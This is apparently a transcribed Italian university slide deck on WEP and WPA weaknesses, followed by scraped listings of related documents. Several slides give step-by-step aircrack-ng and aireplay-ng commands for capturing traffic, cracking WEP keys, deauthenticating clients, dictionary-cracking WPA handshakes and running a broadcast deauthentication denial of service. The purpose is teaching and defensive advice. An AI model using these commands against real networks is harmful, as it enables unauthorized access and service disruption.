Sicurezza nei protocolli wireless parte II

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Sicurezza nei protocolli wireless parte II"

Transcript

1 Sicurezza nei protocolli wireless parte II WEP e WPA Di Alessio Guadagnini Corso di Laurea Scienze dell'informazione A.A. 2007/2008

2 WEP WEP è acronimo di Wired Equivalent Privacy Protocollo con chiave a crittazione simmetrica basato su disgiunzione esclusiva (meglio conosciuta come XOR) Ogni Host che intende collegarsi all'access point (AP) mediante protocollo WEP deve conoscere la chiave Lo XOR non è il solo meccanismo su cui si basa WEP, viene usato anche un algoritmo che si basa sul protocollo RC4, apprezzato per le ottime prestazioni su applicazioni crittografiche in real time. La chiave scelta dall'utente (detta intermedia) è data in pasto all'algoritmo che restituirà la chiave di crittazione Si utilizza come algoritmo per il controllo di integrità dei pacchetti CRC-32 chiave intermedia ---> RC4(chiave intermedia) = chiave di crittazione

3 WEP Usando solo questi accorgimenti riusciamo a celare la password, ma non si scongiura la possibilità di risalire alla chiave originale conoscendo un pacchetto crittato e il suo corrispettivo in chiaro La soluzione è modificare la chiave intermedia per ogni pacchetto, cambiando quindi la chiave di crittazione finale Il procedimento sarà quindi: 1) chiave 40 o 104 bit + IV 24 bit = chiave intermedia 64 o 128 bit 2) RC4 (chiave intermedia) = chiave di crittazione finale con cui fare XOR

4 Codifica WEP L'utente immette la chiave segreta che viene concatenata all'iv spedito in chiaro dall'ap Ne risulta una stringa, usata come seme per uno Pseudo Random Number Generator (basato su RC4) Parallelamente sul testo in chiaro eseguiamo un test di integrità dei dati, ottenendo un ICV (Integrity( Check Value) che sarà concatenato al messaggio Alle due stringhe di pari lunghezza cosi ottenute (chiave e testo del messaggio) applichiamo lo XOR ottenendo il testo cifrato

5 Decodifica WEP Partendo dall'iv ricevuto, lo si aggiunge alla chiave segreta in possesso. Otteniamo il seme da dare in pasto al PNRG. Procediamo con lo XOR tra il keystream e il testo cifrato. Controlliamo l'integrità del pacchetto con CRC-32. Raffrontiamo ICV' appena calcolato con ICV che ci è stato mandato insieme al pacchetto originale, se differiscono si richiede che il pacchetto sia rispedito.

6 Problemi: 1) L'AP inserisce i 24 bit dell'iv in chiaro 2) Non è corretto dire che l'ap modifica ogni volta l'iv (24 bit == 2^24 chiavi) con 54 Mb/s a pieno carico e pacchetti da 1,5 KB in un' ora si esauriscono gli Initialization Vector 3) Errori di trasmissione costringono l'ap ad utilizzare gli IV dall'inizio Qual è l'implicazione di avere due pacchetti che hanno utilizzato la medesima chiave? La risposta è nella natura intrinseca dello XOR

7 Implicazioni dello XOR Cypher-1 XOR Cypher-2 = (Plain-1 XOR Key) XOR (Key XOR Plain-2) = Plain-1 XOR Plain-2 C1 X C2 P1 X Key X P2 X Key P1 X P2 Abbiamo il risultato di XOR tra due pacchetti in chiaro, conoscendone uno se ne ricava l'altro ma soprattutto ricaviamo la chiave. Plain-1 XOR (Cypher-1 XOR Cypher-2) = Plain-1 XOR (Plain-1 XOR Plain-2) = Plain-2 Plain-1 XOR Cypher1 = Plain-1 XOR (Plain-1 XOR Key) = Key Obiezioni: 1) E' davvero possibile venire a conoscenza di un pacchetto in chiaro? 2) Assumendo corretto il procedimento, la chiave ottenuta è l'output dell'algoritmo RC4 e non quella immessa dall'utente sommata all'iv. Come ci può servire visto che cambia al variare dell'iv?

8 Paradosso dell'autenticazione Il WEP prevede un sistema di autenticazione precedente alla connessione: Open System Authentication (aperta): il protocollo non richiede autenticazione Shared Key Authentication (condivisa): autenticazione abilitata Lo scopo sarebbe aumentare la sicurezza della connessione, il risultato è l'esatto opposto: vediamo nel dettaglio i passaggi Il client fa una richiesta di autenticazione all'ap L'AP risponde inviando un pacchetto da 128 byte in chiaro Il client risponde reinviando tale pacchetto crittato con la chiave comune (shared Key) L'AP fa un check per verificare che il pacchetto sia stato crittato correttamente e garantisce al client la connessione in caso affermativo Sniffando I pacchetti in esame si ottiene un pacchetto in chiaro e il suo corrispettivo crittato

9 Attacco a WEP La teoria appena illustrata presenta uno scenario in cui la sicurezza dei dati è seriamente minata, ma all'atto pratico è realmente così? La risposta è SI! Motivazioni: La connessione è wireless di tipo radio, non la si può circoscrivere ad un' area ben definita Esistono svariati programmi gratuiti ed assolutamente legali per violare il WEP, accessibili anche ad utenti non esperti e supportati dai principali sistemi operativi Non è richiesto uso di hardware dedicato per lo scopo, basta un laptop di fascia media con una normale scheda di rete wireless I tempi richiesti per un attacco completo oscillano tra i 10 minuti e le poche ore Le debolezze del protocollo sono materia nota sin dal 2001 ed in rete si trovano innumerevoli guide che illustrano come sfruttarle

10 Attacco a WEP parte 1 Recupero delle informazioni: Condizione primaria è avere una scheda wireless che possa lavorare in modalità promiscua, ovvero in ascolto o meglio sniffing del traffico wireless, un sistema operativo mac o linux (come nel caso di questo esempio). # iwconfig <interfaccia di rete> mode monitor Procediamo controllando la presenza di AP nell'area, quanti host sono connessi e il traffico generato; per farlo ci avvaliamo di aircrack-ng insieme alla sua suite di applicativi # airodump-ng -c <channel number> -w <dumpfile> <interfaccia di rete> CH 7 ][ Elapsed: 36 s ][ :48 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:E0:71:CF WPA TKIP PSK NETGEAR 00:14:BF:C5:AD: OPN pimpi 00:1B:11:D6:00:2C OPN LiberoWiFi 00:03:6F:90:74:2F WEP WEP Alice BSSID STATION PWR Lost Packets Probes 00:14:6C:E0:71:CF 00:13:02:68:C8:9F :14:BF:C5:AD:06 00:10:60:60:50:

11 Attacco a WEP parte 2 L'attacco e il recupero della chiave: Dopo aver raccolto un cospicuo numero di pacchetti (indicativamente IV per chiavi a 64 bit, per quelle a 128), possiamo provare a lanciare aircrack-ng nella speranza di ottenere la chiave. # aircrack-ng -a <codice di attacco> -b <MAC dell'ap> -n <N bit della chiave> <dumpfile> Aircrack-ng [00:00:23] Tested keys (got IVs) KB depth byte(vote) 0 0/ 2 7B ( 13) 33( 10) 2D( 5) CE( 5) 37( 4) 61( 4) 1 0/ 5 16 ( 17) 53( 16) 8D( 15) A7( 13) F6( 13) 5E( 5) 2 0/ 4 65 ( 15) F1( 13) 23( 12) 33( 10) 1A( 5) 35( 5) 3 0/ 2 E8 ( 15) B5( 13) 13( 5) 5D( 5) 02( 3) 27( 3) 4 0/ 3 C0 ( 17) 7 A( 15) B8( 15) 42( 6) 45( 6) 05( 5) 5 0/ 3 C9 ( 15) 71( 12) C6( 12) 17( 5) 35( 5) 74( 5) 6 1/ 4 2B ( 15) FD( 12) A8( 9) 40( 5) 57( 5) 8E( 5) 7 0/ 1 7A ( 180) 30( 15) 38( 15) EB( 12) 78( 6) 54( 5) 8 4/ 12 A0 ( 12) EB( 12) F6( 12) F7( 12) F3( 11) 04( 9) 9 1/ 5 37 ( 15) 4C( 12) 45( 9) 35( 8) 42( 6) 4D( 6) 10 0/ 3 09 ( 24) 67( 12) 92( 12) F1( 10) EB( 8) 03( 6)

12 Attacco a WEP parte 3 Il cracking di una chiave WEP è legato a due condizioni: - Serve almeno un host collegato all'ap - Serve sniffare parecchio traffico per essere ragionevolmente sicuri di ottenere la chiave Sfruttare le altre falle del WEP: Verificata la prima condizione, possiamo indurre la seconda con 5 tipi di attacchi: 1) Deautenticazione: (solo WPA) scollega un client dall'ap a cui è associato per indurlo a richiedere l'autenticazione ottenendo pacchetti di 4-way-handshake. 2) Fake autentication: utile per collegarsi all'ap anche se filtra i MAC address 3) Interactive packet replay: replica i pacchetti letti stimolado l'ap a fare altrettanto, raddoppiando di fatto il traffico generato 4) Arp request reinjection: si individua una richiesta ARP che viene reinviata ripetutamente in modo da generare continue risposte e quindi traffico utile 5) Korek chopchop: Basandosi su metodi statistici di criptoanalisi si ricava la chiave WEP sfruttando le debolezze del protocollo RC4.

13 Attacco a WEP parte 4 Il comando che concretizza questi attacchi è aireplay-ng 1) Deautenticazione: (solo WPA) aireplay-ng a <BSSID> -c <MAC Client> <interfaccia di rete> 2) Fake authentication: aireplay-ng -1 <delay> -e <ESSID> -a <BSSID> -h <MAC Client> <interfaccia rete> 3) Interactive Packet Replay: aireplay-ng -2 -b <BSSID> -h <MAC Client Autenticato> -n 100 -p c \\ \\ FF:FF:FF:FF:FF:FF <interfaccia di rete> 4) Arp Request Injection: aireplay-ng -2 -b <BSSID> -h <MAC Client autenticato> <interfaccia di rete> 5) Korek chopchop: aireplay-ng -4 -b <BSSID> <interfaccia di rete>

14 WPA (Wi-Fi Protected Access) Scoperte le debolezze del WEP la Wi-Fi alliance ha definito un nuovo metodo di crittazione, il WPA Problemi: - Aumentare la sicurezza rispetto a WEP sull'hardware esistente e già presente sul mercato - Necessità di appoggiarsi ancora ad RC4 Soluzione: - Aggiunta la possibilità di autenticazione con credenziali di accesso (enterprise) - Adottate migliorie presentate nel protocollo di estensione del WEP chiamato TKIP (Temporal Key Integrity Protocol) - Affiancamento di EAP o RADIUS (Remote Access Dial-in User Service) per soluzioni enterprise - Utilizzo di PMK (Pairwise Master Key) derivata da PSK (Pre Shared Key) per l'autenticazione per soluzioni personal. Si svolge in 4 passaggi che prendono il nome di four way handshake

15 Four way handshake L'AP invia una valore casuale detto ANonce al Client. Il Client calcola la PTK usando la PMK in suo possesso, l'anounce, l'snounce (numero random generato da se stesso) e il MAC Address suo e dell'ap. Viene quindi inviato all'ap anche l'snounce per permettere il calcolo della PTK. L'AP calcola la PTK usando l'snounce ed invia il GTK (Group Temporal Key) al client per garantirgli la connessione. Il Client invia un pacchetto di Acknolegment per notificare l'avvenuta ricezione dei dati.

16 Migliorie in WPA Viene creata una chiave intermedia differente per ogni sessione di autenticazione La PMK è usata solo una volta, all'atto dell' autenticazione per generare la PTK, sempre diversa a causa dei numeri pseudo random (ANounce e Snounce) Le dimensioni degli IV sono incrementate a 48 bit contro i 24 del WEP e non sono ripetuti a fronte di interferenze o collisioni I biti minimi per la chiave sono 128 contro i 40 del WEP Viene adottato MIC in sostituzione di CRC-32 impedendo la contraffazione dell'integrità Tuttavia... Rimane come algoritmo di crittazione RC4 esponendo il protocollo a futuri attacchi (poichè quelli visti finora sono annullati dal processo di autenticazione con TKIP)

17 WPA2 WPA2 è più robusto rispetto a WPA ma necessita di hardware aggiornato, non è adattabile ai dispositivi presenti sul mercato. Caratteristiche: nome ufficiale IEEE i, caratterizzato da CCMP (Counter Mode with CBC-MAC Protocol) Utilizzo di un robusto algoritmo di crittazione chiamato AES (Advanced Encription Standard) che si appresta a sostituire DES Necessita di hardware dedicato per cifratura / decifratura Tallone d'achille: Le specifiche del protocollo WPA sono note, quindi è possibile sferrare un attacco brute force per violare il protocollo. Il punto debole non è nella chiave intermedia che cambia ad ogni sessione, ma nel processo di four way handshake violando il quale entriamo in possesso della PMK

18 Attacco a WPA parte 1 La conoscenza della PMK ci permetterebbe di fingerci un Client autorizzato e quindi ad instaurare una connessione con l'ap, tuttavia viene scambiata solo una volta per sessione. Come fare ad ottenerla? Deautenticazione: permette ad una scheda di rete attaccante di inviare opportuni pacchetti anche se non autenticata. La scheda attaccante invia la richiesta di deautenticazione al client che si scollega Il client automaticamente cerca di ricollegarsi L'attaccante a questo punto sniffa il traffico che gli interessa e ne fa un dump Ora non rimane che tentare il brute force aiutandosi con un dizionario o in caso di insuccesso, provando le possibili permutazioni di lettere e numeri (computazionalmente molto più oneroso)

19 Recupero delle informazioni: del tutto identiche all'attacco a WEP Attacco a WPA parte 2 # iwconfig <interfaccia di rete> mode monitor # airodump-ng -c <channel number> -w <dumpfile> <interfaccia di rete> Mentre viene registrato tutto il traffico che transita nell'etere, da un' altra shell lanciamo il comando che deautentica il client connesso all'ap. # aireplay-ng a <BSSID> -c <Client MAC address> <interfaccia di rete> Ci è ora possibile cominciare l'attacco vero e proprio Attacco: con questo comando intendiamo provare ricorsivamente tutte le entry del dizionario alla ricerca della password # aircrack-ng -a 2 -b <BSSID> -w <file dizionario> <dumpfile>

20 Attacco a WPA - parte 3 E' possibile che la password utilizzata per proteggere la connessione sia di tipo alfanumerico con aggiunta di caratteri speciali _! ). Questo è il caso in cui un attaccante con un normale laptop non può fare molto in quanto dovrebbe avvalersi di applicativi come John the ripp3r che permutano tutte le possibili combinazioni di caratteri e simboli con un attacco brute force e che richiedono tempi di calcolo elevati. # john -wordlist=<path to password list> <dumpfile> Tuttavia... Se la password non presenta criteri di sicurezza elevati è possibile anche in questo recuperarla in tempi ragionevoli (qualche decina di ore)

21 Implicazioni della Deautenticazione Un altro aspetto importante legato alla deautenticazione è l'attacco di tipo DOS (Denial Of Service) Di fatto se noi modifichiamo il comando di prima per lanciare la richiesta in broadcast e aumentiamo il numero di pacchetti da inviare, impediamo ad ogni client di collegarsi a quell'ap! # aireplay-ng a <BSSID> <interfaccia di rete> Tutto questo senza conoscere la password ma solo conoscendo il MAC dell'ap (che non può essere mascherato al contrario dell'essid)

22 Conclusioni Come è stato abbondantemente illustrato il WEP è da considerarsi insicuro e non andrebbe usato WPA è un ottimo sostituto, ma anche in questo caso va utilizzato con consapevolezza, infatti una password debole fa vacillare la sicurezza anche di WPA Password deboli: - password con meno di 8 caratteri - termini presenti nei dizionari - nomi propri seguiti da date di nascita Password robuste: password alfanumeriche con numero di caratteri superiore a 20 (ce ne sono 63 disponibili) Ma sopratutto: modificare la password ad intervalli regolari

23 Sitografia Debolezze nel protocollo RC4 Problemi di sicurezza John the ripp3r Aircrack-ng Wikipedia WEP Insicurezza nel WEP Wikipedia WPA Sicurezza Wi-fi Wikipedia WPA2

WI FI Alliance (1999) Reti Wi Fi (IEEE 802.11) 802.11a 802.11b 802.11g 802.11n

WI FI Alliance (1999) Reti Wi Fi (IEEE 802.11) 802.11a 802.11b 802.11g 802.11n WI FI Alliance (1999) Reti Wi Fi (IEEE 802.11) 802.11a 802.11b 802.11g 802.11n IEEE 802.11a Data Rilascio Frequenza Operativa Throughput Network Bitrate Ottobre 1999 5 GHz 27 Mbps 54 Mbps IEEE 802.11b

Dettagli

Crittografia e sicurezza delle reti. WEP: Wired Equivalent Privacy

Crittografia e sicurezza delle reti. WEP: Wired Equivalent Privacy Crittografia e sicurezza delle reti WEP: Wired Equivalent Privacy Stream Ciphers Inizia con una chiave segreta ( seed ) Genera uno stream di byte (Keystream): byte i dello stream è funzione della chiave

Dettagli

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it Sicurezza delle reti wireless Alberto Gianoli alberto.gianoli@fe.infn.it Concetti di base IEEE 802.11: famiglia di standard tra cui: 802.11a, b, g: physical e max data rate spec. 802.11e: QoS (traffic

Dettagli

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link Sicurezza ai livelli di rete e data link Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione può essere introdotto anche ai livelli inferiori dello stack 2 Sicurezza

Dettagli

RC4 RC4. Davide Cerri. Davide Cerri CEFRIEL - Politecnico di Milano cerri@cefriel.it http://www.cefriel.it/~cerri/

RC4 RC4. Davide Cerri. Davide Cerri CEFRIEL - Politecnico di Milano cerri@cefriel.it http://www.cefriel.it/~cerri/ POLITECNICO DI MILANO CEFRIEL - Politecnico di Milano cerri@cefriel.it http://www.cefriel.it/~cerri/ è un cifrario a flusso progettato da Ron Rivest (la R di RSA) nel 1987. Era un segreto commerciale della

Dettagli

Sicurezza delle reti. Monga. 802.11i (WPA2) Wireless Sensor Network Secure data aggregation Secure localization WPA. Sicurezza delle reti.

Sicurezza delle reti. Monga. 802.11i (WPA2) Wireless Sensor Network Secure data aggregation Secure localization WPA. Sicurezza delle reti. 1 (2) (2) Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it data Lezione XIX: data a.a. 2012/13 1 cba 2011 13 M.. Creative Commons Attribuzione-Condividi allo stesso

Dettagli

Wi-Fi, la libertà di navigare in rete senza fili. Introduzione.

Wi-Fi, la libertà di navigare in rete senza fili. Introduzione. Wi-Fi, la libertà di navigare in rete senza fili. Introduzione. L evoluzione delle tecnologie informatiche negli ultimi decenni ha contribuito in maniera decisiva allo sviluppo del mondo aziendale, facendo

Dettagli

Atlantis Land Technical Resources Product: Subject: Language:

Atlantis Land Technical Resources Product: Subject: Language: Atlantis Land Technical Resources Product: A02-OCL300 / A02-OCL200 / A02-OAP301 / A02-OHS302 Subject: Creazione di profilo di sicurezza Language: Italiano Scopo del documento è supportare l utente nella

Dettagli

SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer

SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer : applicazioni telematiche Secure Socket Layer E-commerce Trading on-line Internet banking... Protocollo proposto dalla Netscape Communications Corporation Garantisce confidenzialità e affidabilità delle

Dettagli

Università di Napoli Federico II Facoltà di Ingegneria Corso di Laurea in Ingegneria Informatica Corso di Protocolli per Reti Mobili

Università di Napoli Federico II Facoltà di Ingegneria Corso di Laurea in Ingegneria Informatica Corso di Protocolli per Reti Mobili Università di Napoli Federico II Facoltà di Ingegneria Corso di Laurea in Ingegneria Informatica Corso di Protocolli per Reti Mobili Lo standard IEEE 802.: Sicurezza Sicurezza nelle reti wireless L'utilizzo

Dettagli

NOTE. Asimmetrici: Utilizza due chiavi, una pubblica ed una privata

NOTE. Asimmetrici: Utilizza due chiavi, una pubblica ed una privata Simmetrici: sono quelli usati dalla crittografia classica ed essi permettono al mittente e al destinatario di usare la medesima chiave per rispettivamente crittare e decrittare un messaggio. Asimmetrici:

Dettagli

WPA, generalità e principi di funzionamento.

WPA, generalità e principi di funzionamento. WPA, generalità e principi di funzionamento. Baglieri Eugenio Matricola: A40/000047 Sicurezza dei Sistemi Informatici 2 C.d.S in Informatica Applicata Facoltà di scienze MM.FF.NN. Università degli Studi

Dettagli

Attacchi a reti WEP. 9 Maggio 2011. Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica

Attacchi a reti WEP. 9 Maggio 2011. Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica Attacchi a reti WEP Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica 9 Maggio 2011 Scaletta 1 Prerequisiti RC4 Initialization vectors 2 Introduzione Uso di RC4

Dettagli

Rete wireless Appunti

Rete wireless Appunti Rete wireless Appunti Topologia della rete La rete wireless ha la seguente topologia: Internet DHCP Radius In Internet con IP LAN 146.48.80.0 192.168.20.0 SSID isti-work SSID isti-register MAP 330 Agli

Dettagli

Wireless Network Esercitazioni. Alessandro Villani avillani@science.unitn.it

Wireless Network Esercitazioni. Alessandro Villani avillani@science.unitn.it Wireless Network Esercitazioni Alessandro Villani avillani@science.unitn.it Security e Reti Wireless Sicurezza: Overview Open network Open network+ MAC-authentication Open network+ web based gateway WEP

Dettagli

Analisi di programmi: Crittografia

Analisi di programmi: Crittografia Analisi di programmi: Crittografia Come caso concreto di sistema, proviamo ad abbozzare e a vedere una prima implementazione di un sistema di crittografia a chiave pubblica La crittografia studia le tecniche

Dettagli

StarShell. Autenticazione. StarShell

StarShell. Autenticazione. StarShell Autenticazione 1 Autenticazione Verifica dell'identità di qualcuno (utente) o qualcosa (host) in un contesto definito Componenti: Oggetto dell'autenticazione Autenticatore Informazione di autenticazione

Dettagli

I TUTORI. I tutori vanno creati la prima volta seguendo esclusivamente le procedure sotto descritte.

I TUTORI. I tutori vanno creati la prima volta seguendo esclusivamente le procedure sotto descritte. I TUTORI Indice Del Manuale 1 - Introduzione al Manuale Operativo 2 - Area Tutore o Area Studente? 3 - Come creare tutti insieme i Tutori per ogni alunno? 3.1 - Come creare il secondo tutore per ogni alunno?

Dettagli

SETEFI. Marco Cantarini, Daniele Maccauro, Domenico Marzolla. 19 Aprile 2012

SETEFI. Marco Cantarini, Daniele Maccauro, Domenico Marzolla. 19 Aprile 2012 e VIRTUALCARD 19 Aprile 2012 e VIRTUALCARD Introduzione Il nostro obiettivo é quello di illustrare la struttura e le caratteristiche di fondo che stanno alla base delle transazioni online operate tramite

Dettagli

1. La rete wireless per noi.

1. La rete wireless per noi. 1. La rete wireless per noi. Stiamo allestendo un servizio di rete wireless esteso per quanto possibile a tutto il Dipartimento. Per cominciare le antenne sono state disposte nei luoghi in cui è più difficile

Dettagli

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Documento stampabile riassuntivo del servizio: la versione aggiornata è sempre quella pubblicata on line all indirizzo

Dettagli

Approfondimento di Marco Mulas

Approfondimento di Marco Mulas Approfondimento di Marco Mulas Affidabilità: TCP o UDP Throughput: banda a disposizione Temporizzazione: realtime o piccoli ritardi Sicurezza Riservatezza dei dati Integrità dei dati Autenticazione di

Dettagli

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Documento stampabile riassuntivo del servizio: la versione aggiornata è sempre quella pubblicata on line all indirizzo

Dettagli

La sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl

La sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl La sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl 30/10/2008 Indice degli argomenti Le reti wireless di tipo Wi-Fi Tipi di rischio: Monitoraggio del traffico

Dettagli

Sicurezza delle email, del livello di trasporto e delle wireless LAN

Sicurezza delle email, del livello di trasporto e delle wireless LAN Sicurezza delle email, del livello di trasporto e delle wireless LAN Damiano Carra Università degli Studi di Verona Dipartimento di Informatica La sicurezza nello stack protocollare TCP/IP Livello di rete

Dettagli

Man-in-the-middle su reti LAN

Man-in-the-middle su reti LAN Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica 21 Marzo 2011 Scaletta 1 2 LAN switched ARP Alcuni attacchi MITM 3 4 5 Che cos è L attacco man-in-the-middle

Dettagli

A intervalli regolari ogni router manda la sua tabella a tutti i vicini, e riceve quelle dei vicini.

A intervalli regolari ogni router manda la sua tabella a tutti i vicini, e riceve quelle dei vicini. Algoritmi di routing dinamici (pag.89) UdA2_L5 Nelle moderne reti si usano algoritmi dinamici, che si adattano automaticamente ai cambiamenti della rete. Questi algoritmi non sono eseguiti solo all'avvio

Dettagli

INTERNET e RETI di CALCOLATORI A.A. 2011/2012 Capitolo 4 DHCP Dynamic Host Configuration Protocol Fausto Marcantoni fausto.marcantoni@unicam.

INTERNET e RETI di CALCOLATORI A.A. 2011/2012 Capitolo 4 DHCP Dynamic Host Configuration Protocol Fausto Marcantoni fausto.marcantoni@unicam. Laurea in INFORMATICA INTERNET e RETI di CALCOLATORI A.A. 2011/2012 Capitolo 4 Dynamic Host Configuration Protocol fausto.marcantoni@unicam.it Prima di iniziare... Gli indirizzi IP privati possono essere

Dettagli

Mac Application Manager 1.3 (SOLO PER TIGER)

Mac Application Manager 1.3 (SOLO PER TIGER) Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i

Dettagli

Inizializzazione degli Host. BOOTP e DHCP

Inizializzazione degli Host. BOOTP e DHCP BOOTP e DHCP a.a. 2002/03 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Inizializzazione degli Host Un

Dettagli

4 3 4 = 4 x 10 2 + 3 x 10 1 + 4 x 10 0 aaa 10 2 10 1 10 0

4 3 4 = 4 x 10 2 + 3 x 10 1 + 4 x 10 0 aaa 10 2 10 1 10 0 Rappresentazione dei numeri I numeri che siamo abituati ad utilizzare sono espressi utilizzando il sistema di numerazione decimale, che si chiama così perché utilizza 0 cifre (0,,2,3,4,5,6,7,8,9). Si dice

Dettagli

DNS-Tunneling. Reference to. Ettore di Giacinto Luca Montunato http://www.pilug.org

DNS-Tunneling. Reference to. Ettore di Giacinto Luca Montunato http://www.pilug.org DNS-Tunneling Reference to Ettore di Giacinto Luca Montunato http://www.pilug.org Se, in un sistema, è possibile trasmettere bits ad un altro, ed esso risponde a questa trasmissione, è praticamente impossibile

Dettagli

Configurazione AP Managed

Configurazione AP Managed NEXT-GEN USG Wireless Controller Configurazione AP Managed Come prima operazione, da fare su tutti gli AP da connettere allo ZyWALL, è di accedere in management all Access-Point, andare nel menù Configuration>

Dettagli

Una minaccia dovuta all uso dell SNMP su WLAN

Una minaccia dovuta all uso dell SNMP su WLAN Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità

Dettagli

Networking Wireless con Windows XP

Networking Wireless con Windows XP Networking Wireless con Windows XP Creare una rete wireless AD HOC Clic destro su Risorse del computer e quindi su Proprietà Clic sulla scheda Nome computer e quindi sul pulsante Cambia Digitare il nome

Dettagli

Firewall, Proxy e VPN. L' accesso sicuro da e verso Internet

Firewall, Proxy e VPN. L' accesso sicuro da e verso Internet L' accesso sicuro da e verso Internet L' accesso ad Internet è ormai una necessità quotidiana per la maggior parte delle imprese. Per garantire la miglior sicurezza mettiamo in opera Firewall sul traffico

Dettagli

Report 2: Sicurezza in una rete 802.11 protetta con Wired Equivalent Privacy

Report 2: Sicurezza in una rete 802.11 protetta con Wired Equivalent Privacy Nomadic Comunication AA 2008-2009 Report 2: Sicurezza in una rete 802.11 protetta con Wired Equivalent Privacy Group N. 4 Marco Cattani, Matteo Chini Sommario Questo report vuole analizzare la sicurezza

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

Interfaccia KNX/IP Wireless GW 90839. Manuale Tecnico

Interfaccia KNX/IP Wireless GW 90839. Manuale Tecnico Interfaccia KNX/IP Wireless GW 90839 Manuale Tecnico Sommario 1 Introduzione... 3 2 Applicazione... 4 3 Menù Impostazioni generali... 5 3.1 Parametri... 5 4 Menù Protezione WLAN... 6 4.1 Parametri... 6

Dettagli

1) GESTIONE DELLE POSTAZIONI REMOTE

1) GESTIONE DELLE POSTAZIONI REMOTE IMPORTAZIONE ESPORTAZIONE DATI VIA FTP Per FTP ( FILE TRANSFER PROTOCOL) si intende il protocollo di internet che permette di trasferire documenti di qualsiasi tipo tra siti differenti. Per l utilizzo

Dettagli

! La crittoanalisi è invece la scienza che cerca di aggirare o superare le protezioni crittografiche, accedendo alle informazioni protette

! La crittoanalisi è invece la scienza che cerca di aggirare o superare le protezioni crittografiche, accedendo alle informazioni protette Crittografia Cenni Damiano Carra Università degli Studi di Verona Dipartimento di Informatica La crittografia! Scienza che si occupa di proteggere l informazione rendendola sicura, in modo che un utente

Dettagli

SISTEMI E RETI. Crittografia. Sistemi distribuiti e configurazione architetturale delle applicazioni WEB.

SISTEMI E RETI. Crittografia. Sistemi distribuiti e configurazione architetturale delle applicazioni WEB. SISTEMI E RETI Crittografia. Sistemi distribuiti e configurazione architetturale delle applicazioni WEB. CRITTOGRAFIA La crittografia è una tecnica che si occupa della scrittura segreta in codice o cifrata

Dettagli

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna Documento stampabile riassuntivo del servizio: la versione aggiornata è sempre quella pubblicata on line all indirizzo

Dettagli

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk

Dettagli

Informatica per la comunicazione" - lezione 13 -

Informatica per la comunicazione - lezione 13 - Informatica per la comunicazione" - lezione 13 - Funzionamento di una password" 1: l utente tramite il suo browser richiede l accesso a una pagina del server; 2: il server richiede il nome utente e la

Dettagli

Laboratorio di reti Relazione N 5 Gruppo 9. Vettorato Mattia Mesin Alberto

Laboratorio di reti Relazione N 5 Gruppo 9. Vettorato Mattia Mesin Alberto Laboratorio di reti Relazione N 5 Gruppo 9 Vettorato Mattia Mesin Alberto Virtual LAN Che cosa è una VLAN? Il termine Virtual LAN indica una serie di tecniche atte a separare un dominio di broadcast, di

Dettagli

Gestione degli indirizzi

Gestione degli indirizzi Politecnico di Milano Facoltà di Ingegneria dell Informazione Gestione degli indirizzi -Address Resolution Protocol (ARP) -Reverse Address Resolution Protocol (RARP) -Dynamic Host Configuration Protocol

Dettagli

Configurazione con Sistema Operativo Apple MAC OS X (versione 10.5)

Configurazione con Sistema Operativo Apple MAC OS X (versione 10.5) Configurazione con Sistema Operativo Apple MAC OS X (versione 10.5) Requisiti Hardware Disporre di un terminale con scheda wireless compatibile con gli standard radio: IEEE802.11b (2,4 GHz 11 Mbps) ed

Dettagli

Reti di Telecomunicazione Lezione 8

